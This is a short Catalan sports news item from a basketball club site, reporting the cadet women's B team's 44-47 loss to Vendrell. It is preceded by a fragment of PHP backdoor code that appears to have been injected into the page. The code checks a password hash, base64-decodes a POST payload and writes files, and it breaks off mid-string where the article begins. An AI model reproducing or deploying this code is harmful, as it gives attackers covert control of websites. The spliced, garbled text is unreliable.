function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení B es refà del mal segon quart però no pot vèncer el Vendrell (44-47) - Tgn Bàsquet Club -

El cadet femení B es refà del mal segon quart però no pot vèncer el Vendrell (44-47)

Updated: març 17, 2015

Una de cal i una de sorra pel cadet femení B. El conjunt que entrena Agustí Oriol va fer un primer quart molt bo contra la defensa en zona rival però ho va tirar tot per terra en el segon període. Un parcial de 2-18 (20-27 al descans), li donava la batuta del partit al Vendrell que ho va saber aprofitar. Les locals, però, no van llençar mai la tovallola i gràcies a tres triples de Guirao van tornar a igualar el matx que es va decidir en un cara o creu final.